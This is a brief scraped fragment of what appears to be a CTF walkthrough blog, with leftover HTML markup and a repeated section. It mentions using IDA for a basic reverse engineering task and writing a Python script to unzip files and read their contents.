Day 21 (Task 26): Reverse engineering (basic)<\/h2>\n\n\n\nI\u2019m going to use IDA reverse engineering tool for the entire RE challenge. You can refer to my ELF RE write-up <\/a>to know more about IDA. Check challenge1 for the challenge. file1 is a decoy.<\/p>\n\n\n\n

Day 16 (Task 21): Python file system<\/h2>\n\n\n\n
You are required to write a python to unzip, calculate and find the content of files. Make sure you understand the code.<\/p>\n\n\n\n

Day 21 (Task 26): Reverse engineering (basic)<\/h2>\n\n\n\n
I\u2019m going to use IDA reverse engineering tool for the entire RE challenge. You can refer to my ELF RE write-up <\/a>to know more about IDA. Check challenge1 for the challenge. file1 is a decoy.<\/p>\n\n\n\n